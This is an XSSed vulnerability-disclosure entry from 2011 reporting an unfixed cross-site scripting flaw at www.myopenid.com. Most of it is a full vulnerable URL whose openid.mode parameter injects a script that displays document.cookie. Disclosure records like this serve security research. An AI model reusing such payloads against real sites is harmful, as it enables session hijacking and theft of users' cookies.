Unfixed XSS vulnerability at www.myopenid.com

2011-10-11T00:00:00
ID XSSED:74225
Type xssed
Reporter SeeMe
Modified 2011-12-13T00:00:00

Description

Security researcher SeeMe, has submitted on 10/11/2011 a cross-site-scripting (XSS) vulnerability affecting www.myopenid.com, which at the time of submission ranked 50573 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/12/2011. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.myopenid.com/server?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=%27%22--%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&openid.assoc_handle=%7BHMAC-SHA1%7D%7B4e1aa111%7D%7BrGO58w%3D%3D%7D&openid.claimed_id=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.identity=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0%2Fidentifier_select&openid.return_to=https%3A%2F%2Flogin.janrain.com%2Fopenid%2Ffinish%3Fdiscovery_token%3Dpd%253A61b231b12f560e20&openid.realm=https%3A%2F%2F%2A.janrain.com%2F&openid.ns.sreg=http%3A%2F%2Fopenid.net%2Fextensions%2Fsreg%2F1.1&openid.sreg.policy_url=https%3A%2F%2Flogin.janrain.com%2Fopenid%2Fsreg_policy&openid.sreg.optional=nickname%2Cemail%2Cfullname